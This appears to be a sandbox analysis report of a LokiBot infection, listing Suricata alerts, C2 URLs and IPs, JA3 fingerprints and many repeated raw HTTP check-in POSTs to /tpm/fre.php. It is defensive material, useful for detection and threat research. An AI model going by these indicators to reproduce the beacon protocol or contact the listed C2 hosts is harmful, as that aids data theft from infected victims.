Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50009 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49987 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50067 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50061 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50067 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50072 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49969 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49969 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49969 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50080 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50083 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50080 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50080 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50009 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50061 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50077 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50061 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49969 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49969 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50085 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50085 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50072 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50080 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49724
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50080 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50074 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50083 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50083 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50072 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50072 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50071 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50071 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50067 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50083 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50083 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50090 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50090 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50090 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50067 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50074 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50006
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50038
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50074 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50074 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49872 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49872 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49872 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50107 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50107 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50107 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50081 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50081 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50077
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50081 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50089 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50107 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50107 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50085
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49872 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49872 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50118 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49964
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50118 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50118 -> 172.245.123.11:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.245.123.11 80			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 194.15.112.248 443			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://172.245.123.11/tpm/fre.php

Source: Joe Sandbox View	IP Address: 194.15.112.248 194.15.112.248
Source: Joe Sandbox View	IP Address: 172.245.123.11 172.245.123.11

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /rtBS?N HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /BLZu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
